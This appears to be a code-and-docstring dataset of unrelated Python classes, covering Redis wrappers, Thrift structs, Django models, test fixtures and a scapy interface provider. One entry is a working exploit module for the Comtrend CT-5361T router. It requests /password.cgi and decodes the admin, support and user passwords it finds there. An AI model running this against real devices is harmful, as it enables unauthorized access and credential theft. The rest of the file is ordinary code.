class TransitionAction(object): <NEW_LINE> <INDENT> __slots__ = ("door_id", "_command_list") <NEW_LINE> def __init__(self, InitCommandList=None): <NEW_LINE> <INDENT> assert InitCommandList is None or isinstance(InitCommandList, CommandList), "%s: %s" % (InitCommandList.__class__, InitCommandList) <NEW_LINE> self.door_id = None <NEW_LINE> if InitCommandList is None: self._command_list = CommandList() <NEW_LINE> else: self._command_list = InitCommandList <NEW_LINE> <DEDENT> @property <NEW_LINE> def command_list(self): <NEW_LINE> <INDENT> return self._command_list <NEW_LINE> <DEDENT> @command_list.setter <NEW_LINE> def command_list(self, CL): <NEW_LINE> <INDENT> assert isinstance(CL, CommandList) or CL is None <NEW_LINE> self._command_list = CL <NEW_LINE> <DEDENT> def clone(self): <NEW_LINE> <INDENT> result = TransitionAction(self._command_list.clone()) <NEW_LINE> result.door_id = self.door_id <NEW_LINE> return result <NEW_LINE> <DEDENT> def __hash__(self): <NEW_LINE> <INDENT> return hash(self._command_list) <NEW_LINE> <DEDENT> def __eq__(self, Other): <NEW_LINE> <INDENT> return self._command_list == Other._command_list <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "(%s: [%s])" % (self.door_id, self._command_list) | Object containing information about commands to be executed upon
transition into a state.
.command_list --> list of commands to be executed upon the transition.
.door_id --> An 'id' which is supposed to be unique for a command list.
It is (re-)assigned during the process of
'EntryActionDB.categorize()'. | 62599087e1aae11d1e7cf5d9 |
class DoubleGaussianNLL(BaseGaussianNLL): <NEW_LINE> <INDENT> posterior_name = 'DoubleGaussianBNNPosterior' <NEW_LINE> def __init__(self, Y_dim): <NEW_LINE> <INDENT> super(DoubleGaussianNLL, self).__init__(Y_dim) <NEW_LINE> self.tril_idx = torch.tril_indices(self.Y_dim, self.Y_dim, offset=0) <NEW_LINE> self.tril_len = len(self.tril_idx[0]) <NEW_LINE> self.out_dim = self.Y_dim**2 + 3*self.Y_dim + 1 <NEW_LINE> <DEDENT> def __call__(self, pred, target): <NEW_LINE> <INDENT> return self.nll_mixture(target, *self.slice(pred), reduce=False) <NEW_LINE> <DEDENT> def slice(self, pred): <NEW_LINE> <INDENT> d = self.Y_dim <NEW_LINE> return torch.split(pred, [d, self.tril_len, d, self.tril_len, 1], dim=1) <NEW_LINE> <DEDENT> def set_trained_pred(self, pred): <NEW_LINE> <INDENT> d = self.Y_dim <NEW_LINE> self.batch_size = pred.shape[0] <NEW_LINE> self.mu = pred[:, :d] <NEW_LINE> self.tril_elements = pred[:, d:d+self.tril_len] <NEW_LINE> self.mu2 = pred[:, d+self.tril_len:2*d+self.tril_len] <NEW_LINE> self.tril_elements2 = pred[:, 2*d+self.tril_len:-1] <NEW_LINE> self.w2 = 0.5*self.sigmoid(pred[:, -1].reshape(-1, 1)) <NEW_LINE> <DEDENT> def sample(self, mean, std, n_samples): <NEW_LINE> <INDENT> self.Y_mean = mean <NEW_LINE> self.Y_std = std <NEW_LINE> samples = torch.zeros([self.batch_size, n_samples, self.Y_dim]).to(mean.device) <NEW_LINE> unif2 = torch.rand(self.batch_size, n_samples).to(mean.device) <NEW_LINE> second_gaussian = (self.w2 > unif2) <NEW_LINE> samples2 = self.sample_full_rank(n_samples, self.mu2, self.tril_elements2, as_numpy=False) <NEW_LINE> samples[second_gaussian, :] = samples2[second_gaussian, :] <NEW_LINE> samples1 = self.sample_full_rank(n_samples, self.mu, self.tril_elements, as_numpy=False) <NEW_LINE> samples[~second_gaussian, :] = samples1[~second_gaussian, :] <NEW_LINE> samples = samples.data.cpu().numpy() <NEW_LINE> return samples | The negative log likelihood (NLL) for a mixture of two Gaussians, each
with a full but constrained as low-rank plus diagonal covariance
Only rank 2 is currently supported. `BaseGaussianNLL.__init__` docstring
for the parameter description. | 625990873317a56b869bf30a |
class Solution: <NEW_LINE> <INDENT> def verticalOrder(self, root): <NEW_LINE> <INDENT> vPosToVals = defaultdict(list) <NEW_LINE> leftMost = 0 <NEW_LINE> rightMost = -1 <NEW_LINE> queue = deque() <NEW_LINE> if root: <NEW_LINE> <INDENT> queue.append( (root,0) ) <NEW_LINE> leftMost = 0 <NEW_LINE> rightMost = 0 <NEW_LINE> <DEDENT> while queue: <NEW_LINE> <INDENT> node, vPos = queue.popleft() <NEW_LINE> vPosToVals[vPos].append( node.val ) <NEW_LINE> if node.left: <NEW_LINE> <INDENT> queue.append( (node.left, vPos-1) ) <NEW_LINE> leftMost = min(leftMost, vPos-1) <NEW_LINE> <DEDENT> if node.right: <NEW_LINE> <INDENT> queue.append( (node.right, vPos+1) ) <NEW_LINE> rightMost = max(rightMost, vPos+1) <NEW_LINE> <DEDENT> <DEDENT> ret = [] <NEW_LINE> for pos in range(leftMost, rightMost+1): <NEW_LINE> <INDENT> ret.append( vPosToVals[pos] ) <NEW_LINE> <DEDENT> return ret | @param root: the root of tree
@return: the vertical order traversal | 62599087283ffb24f3cf542d |
class RedisSet(PassThroughSerializer): <NEW_LINE> <INDENT> def __init__(self, set_key, redis_client=redis_config.CLIENT): <NEW_LINE> <INDENT> self._client = redis_client or redis_pipe.RedisPipe() <NEW_LINE> self.set_key = set_key <NEW_LINE> <DEDENT> def __len__(self): <NEW_LINE> <INDENT> return self._client.scard(self.set_key) <NEW_LINE> <DEDENT> def __iter__(self): <NEW_LINE> <INDENT> for item in self._client.sscan_iter(self.set_key): <NEW_LINE> <INDENT> yield self.deserialize(item) <NEW_LINE> <DEDENT> <DEDENT> def delete_all(self): <NEW_LINE> <INDENT> self._client.delete(self.set_key) <NEW_LINE> <DEDENT> def add(self, val): <NEW_LINE> <INDENT> val = self.serialize(val) <NEW_LINE> self._client.sadd(self.set_key, val) <NEW_LINE> <DEDENT> def update(self, vals): <NEW_LINE> <INDENT> vals = [self.serialize(x) for x in vals] <NEW_LINE> self._client.sadd(self.set_key, *vals) <NEW_LINE> <DEDENT> def __contains__(self, val): <NEW_LINE> <INDENT> return self._client.sismember(self.set_key, self.serialize(val)) <NEW_LINE> <DEDENT> def pop(self): <NEW_LINE> <INDENT> return self.deserialize(self._client.spop(self.set_key)) <NEW_LINE> <DEDENT> def remove(self, val): <NEW_LINE> <INDENT> self._client.srem(self.set_key, self.serialize(val)) <NEW_LINE> <DEDENT> def __unicode__(self): <NEW_LINE> <INDENT> objs = self._client.smembers(self.set_key) <NEW_LINE> objs = [self.deserialize(x) for x in objs] <NEW_LINE> return u"RedisSet(%s)" % (objs,) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.__unicode__() | An object which behaves like a Python set, but which is based by Redis. | 625990874527f215b58eb766 |
class ConfFixture(config_fixture.Config): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> super(ConfFixture, self).setUp() <NEW_LINE> self.conf.set_default('compute_driver', 'fake.SmallFakeDriver') <NEW_LINE> self.conf.set_default('fake_network', True) <NEW_LINE> self.conf.set_default('flat_network_bridge', 'br100') <NEW_LINE> self.conf.set_default('floating_ip_dns_manager', 'nova.tests.unit.utils.dns_manager') <NEW_LINE> self.conf.set_default('force_dhcp_release', False) <NEW_LINE> self.conf.set_default('host', 'fake-mini') <NEW_LINE> self.conf.set_default('instance_dns_manager', 'nova.tests.unit.utils.dns_manager') <NEW_LINE> self.conf.set_default('network_size', 8) <NEW_LINE> self.conf.set_default('num_networks', 2) <NEW_LINE> self.conf.set_default('periodic_enable', False) <NEW_LINE> self.conf.set_default('project_id_regex', '[0-9a-fk\-]+', 'osapi_v21') <NEW_LINE> self.conf.set_default('use_ipv6', True) <NEW_LINE> self.conf.set_default('vlan_interface', 'eth0') <NEW_LINE> self.conf.set_default('auth_strategy', 'noauth2', group='api') <NEW_LINE> self.conf.set_default('connection', "sqlite://", group='api_database') <NEW_LINE> self.conf.set_default('sqlite_synchronous', False, group='api_database') <NEW_LINE> self.conf.set_default('connection', "sqlite://", group='database') <NEW_LINE> self.conf.set_default('sqlite_synchronous', False, group='database') <NEW_LINE> self.conf.set_default('backend', 'nova.keymgr.conf_key_mgr.ConfKeyManager', group='key_manager') <NEW_LINE> self.conf.set_default('api_paste_config', paths.state_path_def('etc/nova/api-paste.ini'), group='wsgi') <NEW_LINE> self.conf.set_default('keep_alive', False, group="wsgi") <NEW_LINE> self.conf.set_default('region_name', 'RegionOne', group='placement') <NEW_LINE> config.parse_args([], default_config_files=[], configure_db=False, init_rpc=False) <NEW_LINE> policy_opts.set_defaults(self.conf) <NEW_LINE> self.addCleanup(utils.cleanup_dns_managers) <NEW_LINE> self.addCleanup(ipv6.api.reset_backend) | Fixture to manage global conf settings. | 62599087adb09d7d5dc0c0e7 |
class GoogleCommand( CommandObject ): <NEW_LINE> <INDENT> def __init__( self, parameter = None ): <NEW_LINE> <INDENT> CommandObject.__init__( self ) <NEW_LINE> self.parameter = parameter <NEW_LINE> if parameter != None: <NEW_LINE> <INDENT> self.setDescription( u"Performs a Google web search for " u"\u201c%s\u201d." % parameter ) <NEW_LINE> <DEDENT> <DEDENT> def run( self ): <NEW_LINE> <INDENT> MAX_QUERY_LENGTH = 2048 <NEW_LINE> if self.parameter != None: <NEW_LINE> <INDENT> text = self.parameter.decode() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> seldict = selection.get() <NEW_LINE> text = seldict.get( "text", u"" ) <NEW_LINE> <DEDENT> text = text.strip() <NEW_LINE> if not text: <NEW_LINE> <INDENT> displayMessage( "<p>No text was selected.</p>" ) <NEW_LINE> return <NEW_LINE> <DEDENT> BASE_URL = "http://www.google.com/search?hl=%s&q=%s" <NEW_LINE> languageCode, encoding = locale.getdefaultlocale() <NEW_LINE> if languageCode: <NEW_LINE> <INDENT> language = languageCode.split( "_" )[0] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> language = "en" <NEW_LINE> <DEDENT> text = urllib.quote_plus( text.encode("utf-8") ) <NEW_LINE> finalQuery = BASE_URL % ( language, text ) <NEW_LINE> if len( finalQuery ) > MAX_QUERY_LENGTH: <NEW_LINE> <INDENT> displayMessage( "<p>Your query is too long.</p>" ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> webbrowser.open_new_tab( finalQuery ) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> pass | Implementation of the 'google' command. | 62599087bf627c535bcb3061 |
class Exploit(exploits.Exploit): <NEW_LINE> <INDENT> __info__ = { 'name': 'Comtrend CT 5361T Password Disclosure', 'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability', 'authors': [ 'TUNISIAN CYBER', ], 'references': [ 'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html' ], 'devices': [ 'Comtrend CT 5361T (more likely CT 536X)', ] } <NEW_LINE> target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) <NEW_LINE> port = exploits.Option(80, 'Target port') <NEW_LINE> def run(self): <NEW_LINE> <INDENT> if self.check(): <NEW_LINE> <INDENT> url = "{}:{}/password.cgi".format(self.target, self.port) <NEW_LINE> print_status("Requesting for {}".format(url)) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '(.+?)'")] <NEW_LINE> creds = [] <NEW_LINE> for regexp in regexps: <NEW_LINE> <INDENT> res = re.findall(regexp[1], response.text) <NEW_LINE> if len(res): <NEW_LINE> <INDENT> creds.append((regexp[0], b64decode(res[0]))) <NEW_LINE> <DEDENT> <DEDENT> if len(creds): <NEW_LINE> <INDENT> print_success("Credentials found!") <NEW_LINE> headers = ("Login", "Password") <NEW_LINE> print_table(headers, *creds) <NEW_LINE> print_info("NOTE: Admin is commonly implemented as root") <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print_error("Credentials could not be found") <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> print_error("Device seems to be not vulnerable") <NEW_LINE> <DEDENT> <DEDENT> @mute <NEW_LINE> def check(self): <NEW_LINE> <INDENT> url = "{}:{}/password.cgi".format(self.target, self.port) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> regexps = ["pwdAdmin = '(.+?)'", "pwdSupport = '(.+?)'", "pwdUser = '(.+?)'"] <NEW_LINE> for regexp in regexps: <NEW_LINE> <INDENT> res = re.findall(regexp, response.text) <NEW_LINE> if len(res): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> b64decode(res[0]) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> return True | Exploit implementation for Comtrend CT-5361T Password Disclosure vulnerability.
If the target is vulnerable it allows to read credentials for admin, support and user." | 625990873617ad0b5ee07cdf |
class KickStarter(DB.Model): <NEW_LINE> <INDENT> id = DB.Column(DB.BigInteger, primary_key=True) <NEW_LINE> name = DB.Column(DB.String, nullable=False) <NEW_LINE> usd_goal = DB.Column(DB.Float, nullable=False) <NEW_LINE> country = DB.Column(DB.String, nullable=False) <NEW_LINE> def __repr__(self): <NEW_LINE> <INDENT> return "<Kickstarter name: {}, USD-GOAL: {}, Country: {}>".format(self.name, self.usd_goal, self.country) | Twitter Users that correspond to tweets | 62599087167d2b6e312b835e |
class BaseTestCase(TestCase): <NEW_LINE> <INDENT> def create_app(self): <NEW_LINE> <INDENT> app.config.from_object('server.config.TestingConfig') <NEW_LINE> return app | Base Tests | 6259908744b2445a339b7723 |
class get_all_tables_result: <NEW_LINE> <INDENT> thrift_spec = ( (0, TType.LIST, 'success', (TType.STRING,None), None, ), (1, TType.STRUCT, 'o1', (MetaException, MetaException.thrift_spec), None, ), ) <NEW_LINE> def __init__(self, success=None, o1=None,): <NEW_LINE> <INDENT> self.success = success <NEW_LINE> self.o1 = o1 <NEW_LINE> <DEDENT> def read(self, iprot): <NEW_LINE> <INDENT> if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: <NEW_LINE> <INDENT> fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) <NEW_LINE> return <NEW_LINE> <DEDENT> iprot.readStructBegin() <NEW_LINE> while True: <NEW_LINE> <INDENT> (fname, ftype, fid) = iprot.readFieldBegin() <NEW_LINE> if ftype == TType.STOP: <NEW_LINE> <INDENT> break <NEW_LINE> <DEDENT> if fid == 0: <NEW_LINE> <INDENT> if ftype == TType.LIST: <NEW_LINE> <INDENT> self.success = [] <NEW_LINE> (_etype495, _size492) = iprot.readListBegin() <NEW_LINE> for _i496 in xrange(_size492): <NEW_LINE> <INDENT> _elem497 = iprot.readString(); <NEW_LINE> self.success.append(_elem497) <NEW_LINE> <DEDENT> iprot.readListEnd() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> elif fid == 1: <NEW_LINE> <INDENT> if ftype == TType.STRUCT: <NEW_LINE> <INDENT> self.o1 = MetaException() <NEW_LINE> self.o1.read(iprot) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> iprot.readFieldEnd() <NEW_LINE> <DEDENT> iprot.readStructEnd() <NEW_LINE> <DEDENT> def write(self, oprot): <NEW_LINE> <INDENT> if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: <NEW_LINE> <INDENT> oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) <NEW_LINE> return <NEW_LINE> <DEDENT> oprot.writeStructBegin('get_all_tables_result') <NEW_LINE> if self.success is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('success', TType.LIST, 0) <NEW_LINE> oprot.writeListBegin(TType.STRING, len(self.success)) <NEW_LINE> for iter498 in self.success: <NEW_LINE> <INDENT> oprot.writeString(iter498) <NEW_LINE> <DEDENT> oprot.writeListEnd() <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> if self.o1 is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('o1', TType.STRUCT, 1) <NEW_LINE> self.o1.write(oprot) <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> oprot.writeFieldStop() <NEW_LINE> oprot.writeStructEnd() <NEW_LINE> <DEDENT> def validate(self): <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] <NEW_LINE> return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not (self == other) | Attributes:
- success
- o1 | 62599087dc8b845886d55148 |
class Turbidity(object): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self._adc = ADC(Pin.board.X6) <NEW_LINE> <DEDENT> def get(self): <NEW_LINE> <INDENT> volts = ((self._adc.read()/ adc_range) * in_voltage) <NEW_LINE> return volts <NEW_LINE> <DEDENT> def NTU(self): <NEW_LINE> <INDENT> volts = self.get() <NEW_LINE> if volts <= 2.5: <NEW_LINE> <INDENT> return 3000 <NEW_LINE> <DEDENT> return (-1120.4 * (volts**2)) + (5742.3 * volts) - 4352.9 | Turbidity meter | 6259908760cbc95b06365b33 |
class UnverifiedEmailError(QiitaError): <NEW_LINE> <INDENT> pass | Email has not been validated | 62599087283ffb24f3cf542f |
class Place(RealmBaseModel, ModelWithDiscussions): <NEW_LINE> <INDENT> TYPE_COUNTRY = 'country' <NEW_LINE> TYPE_LOCALITY = 'locality' <NEW_LINE> TYPE_HOUSE = 'house' <NEW_LINE> TYPES = ( (TYPE_COUNTRY, 'Страна'), (TYPE_LOCALITY, 'Местность'), (TYPE_HOUSE, 'Здание'), ) <NEW_LINE> title = models.CharField('Название', max_length=255) <NEW_LINE> description = models.TextField('Описание', blank=True, null=False, default='') <NEW_LINE> geo_title = models.TextField('Полное название', null=True, blank=True, unique=True) <NEW_LINE> geo_bounds = models.CharField('Пределы', max_length=255, null=True, blank=True) <NEW_LINE> geo_pos = models.CharField('Координаты', max_length=255, null=True, blank=True) <NEW_LINE> geo_type = models.CharField('Тип', max_length=25, null=True, blank=True, choices=TYPES, db_index=True) <NEW_LINE> history = HistoricalRecords() <NEW_LINE> class Meta: <NEW_LINE> <INDENT> verbose_name = 'Место' <NEW_LINE> verbose_name_plural = 'Места' <NEW_LINE> <DEDENT> def get_pos(self): <NEW_LINE> <INDENT> lat, lng = self.geo_pos.split('|') <NEW_LINE> return lat, lng <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def create_place_from_name(cls, name): <NEW_LINE> <INDENT> from .utils import get_location_data <NEW_LINE> loc_data = get_location_data(name) <NEW_LINE> if loc_data is None: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> full_title = loc_data['name'] <NEW_LINE> place = cls( title=loc_data['requested_name'], geo_title=full_title, geo_bounds=loc_data['bounds'], geo_pos=loc_data['pos'], geo_type=loc_data['type'] ) <NEW_LINE> try: <NEW_LINE> <INDENT> place.save() <NEW_LINE> <DEDENT> except IntegrityError: <NEW_LINE> <INDENT> place = cls.objects.get(geo_title=full_title) <NEW_LINE> <DEDENT> return place <NEW_LINE> <DEDENT> def __unicode__(self): <NEW_LINE> <INDENT> return self.geo_title | Географическое место. Для людей, событий и пр. | 62599087099cdd3c636761c2 |
class DeviceDetails(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'serial_number': {'readonly': True}, 'management_resource_id': {'readonly': True}, 'management_resource_tenant_id': {'readonly': True}, } <NEW_LINE> _attribute_map = { 'serial_number': {'key': 'serialNumber', 'type': 'str'}, 'management_resource_id': {'key': 'managementResourceId', 'type': 'str'}, 'management_resource_tenant_id': {'key': 'managementResourceTenantId', 'type': 'str'}, } <NEW_LINE> def __init__( self, **kwargs ): <NEW_LINE> <INDENT> super(DeviceDetails, self).__init__(**kwargs) <NEW_LINE> self.serial_number = None <NEW_LINE> self.management_resource_id = None <NEW_LINE> self.management_resource_tenant_id = None | Device details.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar serial_number: device serial number.
:vartype serial_number: str
:ivar management_resource_id: Management Resource Id.
:vartype management_resource_id: str
:ivar management_resource_tenant_id: Management Resource Tenant ID.
:vartype management_resource_tenant_id: str | 6259908792d797404e389924 |
class GcfHook(GoogleCloudBaseHook): <NEW_LINE> <INDENT> _conn = None <NEW_LINE> def __init__(self, api_version, gcp_conn_id='google_cloud_default', delegate_to=None): <NEW_LINE> <INDENT> super(GcfHook, self).__init__(gcp_conn_id, delegate_to) <NEW_LINE> self.api_version = api_version <NEW_LINE> <DEDENT> def get_conn(self): <NEW_LINE> <INDENT> if not self._conn: <NEW_LINE> <INDENT> http_authorized = self._authorize() <NEW_LINE> self._conn = build('cloudfunctions', self.api_version, http=http_authorized, cache_discovery=False) <NEW_LINE> <DEDENT> return self._conn <NEW_LINE> <DEDENT> def get_function(self, name): <NEW_LINE> <INDENT> return self.get_conn().projects().locations().functions().get( name=name).execute(num_retries=NUM_RETRIES) <NEW_LINE> <DEDENT> def list_functions(self, full_location): <NEW_LINE> <INDENT> list_response = self.get_conn().projects().locations().functions().list( parent=full_location).execute(num_retries=NUM_RETRIES) <NEW_LINE> return list_response.get("functions", []) <NEW_LINE> <DEDENT> def create_new_function(self, full_location, body): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().create( location=full_location, body=body ).execute(num_retries=NUM_RETRIES) <NEW_LINE> operation_name = response["name"] <NEW_LINE> return self._wait_for_operation_to_complete(operation_name) <NEW_LINE> <DEDENT> def update_function(self, name, body, update_mask): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().patch( updateMask=",".join(update_mask), name=name, body=body ).execute(num_retries=NUM_RETRIES) <NEW_LINE> operation_name = response["name"] <NEW_LINE> return self._wait_for_operation_to_complete(operation_name) <NEW_LINE> <DEDENT> def upload_function_zip(self, parent, zip_path): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().generateUploadUrl( parent=parent ).execute(num_retries=NUM_RETRIES) <NEW_LINE> upload_url = response.get('uploadUrl') <NEW_LINE> with open(zip_path, 'rb') as fp: <NEW_LINE> <INDENT> requests.put( url=upload_url, data=fp.read(), headers={ 'Content-type': 'application/zip', 'x-goog-content-length-range': '0,104857600', } ) <NEW_LINE> <DEDENT> return upload_url <NEW_LINE> <DEDENT> def delete_function(self, name): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().delete( name=name).execute(num_retries=NUM_RETRIES) <NEW_LINE> operation_name = response["name"] <NEW_LINE> return self._wait_for_operation_to_complete(operation_name) <NEW_LINE> <DEDENT> def _wait_for_operation_to_complete(self, operation_name): <NEW_LINE> <INDENT> service = self.get_conn() <NEW_LINE> while True: <NEW_LINE> <INDENT> operation_response = service.operations().get( name=operation_name, ).execute(num_retries=NUM_RETRIES) <NEW_LINE> if operation_response.get("done"): <NEW_LINE> <INDENT> response = operation_response.get("response") <NEW_LINE> error = operation_response.get("error") <NEW_LINE> if error: <NEW_LINE> <INDENT> raise AirflowException(str(error)) <NEW_LINE> <DEDENT> return response <NEW_LINE> <DEDENT> time.sleep(TIME_TO_SLEEP_IN_SECONDS) | Hook for the Google Cloud Functions APIs. | 62599087d486a94d0ba2db46 |
class LibpcapProvider(InterfaceProvider): <NEW_LINE> <INDENT> name = "libpcap" <NEW_LINE> libpcap = True <NEW_LINE> def load(self): <NEW_LINE> <INDENT> if not conf.use_pcap or WINDOWS: <NEW_LINE> <INDENT> return {} <NEW_LINE> <DEDENT> if not conf.cache_pcapiflist: <NEW_LINE> <INDENT> load_winpcapy() <NEW_LINE> <DEDENT> data = {} <NEW_LINE> i = 0 <NEW_LINE> for ifname, dat in conf.cache_pcapiflist.items(): <NEW_LINE> <INDENT> description, ips, flags, mac = dat <NEW_LINE> i += 1 <NEW_LINE> if not mac: <NEW_LINE> <INDENT> from scapy.arch import get_if_hwaddr <NEW_LINE> try: <NEW_LINE> <INDENT> mac = get_if_hwaddr(ifname) <NEW_LINE> <DEDENT> except Exception: <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> <DEDENT> if_data = { 'name': ifname, 'description': description or ifname, 'network_name': ifname, 'index': i, 'mac': mac or '00:00:00:00:00:00', 'ips': ips, 'flags': flags } <NEW_LINE> data[ifname] = NetworkInterface(self, if_data) <NEW_LINE> <DEDENT> return data <NEW_LINE> <DEDENT> def reload(self): <NEW_LINE> <INDENT> if conf.use_pcap: <NEW_LINE> <INDENT> from scapy.arch.libpcap import load_winpcapy <NEW_LINE> load_winpcapy() <NEW_LINE> <DEDENT> return self.load() | Load interfaces from Libpcap on non-Windows machines | 625990874a966d76dd5f0a76 |
class RemuneracionNomenclador(RemuneracionPorcentual): <NEW_LINE> <INDENT> cargo = models.ForeignKey('Cargo', help_text=u'Remuneración porcentual inherente a un cargo en particular.') | Una remuneración porcentual nomenclador inherente a un cargo en particular. | 6259908763b5f9789fe86cfa |
class NotFilter(AbstractFilter): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> AbstractFilter.__init__(self, "NotFilter") <NEW_LINE> <DEDENT> def add_child(self, mo): <NEW_LINE> <INDENT> self._child.append(mo) <NEW_LINE> <DEDENT> def write_xml(self, xml_doc=None, option=None, element_name=None): <NEW_LINE> <INDENT> if xml_doc is None: <NEW_LINE> <INDENT> xml_obj=Element("not") <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if element_name == None: <NEW_LINE> <INDENT> xml_obj = SubElement(xml_doc,"not") <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> xml_obj = SubElement(xml_doc, element_name) <NEW_LINE> <DEDENT> <DEDENT> self.child_write_xml(xml_obj, option) <NEW_LINE> return xml_obj <NEW_LINE> <DEDENT> def set_attr(self, key, value): <NEW_LINE> <INDENT> self.__dict__[key] = value <NEW_LINE> <DEDENT> def get_attr(self, key): <NEW_LINE> <INDENT> return self.__dict__[key] <NEW_LINE> <DEDENT> def load_from_xml(self, element, handle): <NEW_LINE> <INDENT> self.set_handle(handle) <NEW_LINE> if element.attrib: <NEW_LINE> <INDENT> for attr_name, attr_value in element.attrib.iteritems(): <NEW_LINE> <INDENT> self.setattr(ImcUtils.word_u(attr_name), str(attr_value)) <NEW_LINE> <DEDENT> <DEDENT> child_elements = element.getchildren() <NEW_LINE> if child_elements: <NEW_LINE> <INDENT> for child_element in child_elements: <NEW_LINE> <INDENT> if not ET.iselement(child_element): <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> child_field_names = [ "abstractFilter", "allbits", "and", "anybit", "bw", "eq", "ge", "gt", "le", "lt", "ne", "not", "or", "wcard", ] <NEW_LINE> cln = ImcUtils.word_u(child_element.tag) <NEW_LINE> child = class_factory(cln) <NEW_LINE> self._child.append(child) <NEW_LINE> child.load_from_xml(child_element, handle) | NotFilter Class. | 625990877b180e01f3e49e2d |
class Trace: <NEW_LINE> <INDENT> def __init__(self, board, time_limits): <NEW_LINE> <INDENT> self.time_limits = [t for t in time_limits] <NEW_LINE> self.initial_board = board.clone() <NEW_LINE> self.actions = [] <NEW_LINE> self.winner = 0 <NEW_LINE> self.reason = "" <NEW_LINE> <DEDENT> def add_action(self, player, action, t): <NEW_LINE> <INDENT> self.actions.append((player, action, t)) <NEW_LINE> <DEDENT> def set_winner(self, winner, reason): <NEW_LINE> <INDENT> self.winner = winner <NEW_LINE> self.reason = reason <NEW_LINE> <DEDENT> def get_initial_board(self): <NEW_LINE> <INDENT> return Board(self.initial_board) <NEW_LINE> <DEDENT> def write(self, f): <NEW_LINE> <INDENT> pickle.dump(self, f) | Keep track of a played game.
Attributes:
time_limits -- a sequence of 2 elements containing the time limits in
seconds for each agent, or None for a time-unlimitted agent
initial_board -- the initial board
actions -- list of tuples (player, action, time) of the played action.
Respectively, the player number, the action and the time taken in
seconds.
winner -- winner of the game
reason -- specific reason for victory or "" if standard | 62599087091ae356687067d3 |
class CurrencyField(DecimalField): <NEW_LINE> <INDENT> def __init__(self, **kwargs): <NEW_LINE> <INDENT> if 'max_digits' in kwargs.keys(): <NEW_LINE> <INDENT> del kwargs['max_digits'] <NEW_LINE> <DEDENT> if 'decimal_places' in kwargs.keys(): <NEW_LINE> <INDENT> del kwargs['decimal_places'] <NEW_LINE> <DEDENT> default = kwargs.get('default', Decimal('0.00')) <NEW_LINE> if 'default' in kwargs.keys(): <NEW_LINE> <INDENT> del kwargs['default'] <NEW_LINE> <DEDENT> return super(CurrencyField,self).__init__(max_digits=12,decimal_places=2,default=default,**kwargs) <NEW_LINE> <DEDENT> def south_field_triple(self): <NEW_LINE> <INDENT> from south.modelsinspector import introspector <NEW_LINE> field_class = "django.db.models.fields.DecimalField" <NEW_LINE> args, kwargs = introspector(self) <NEW_LINE> return (field_class, args, kwargs) | A CurrencyField is simply a subclass of DecimalField with a fixed format:
max_digits = 12, decimal_places=2, and defaults to 0.00 | 6259908792d797404e389925 |
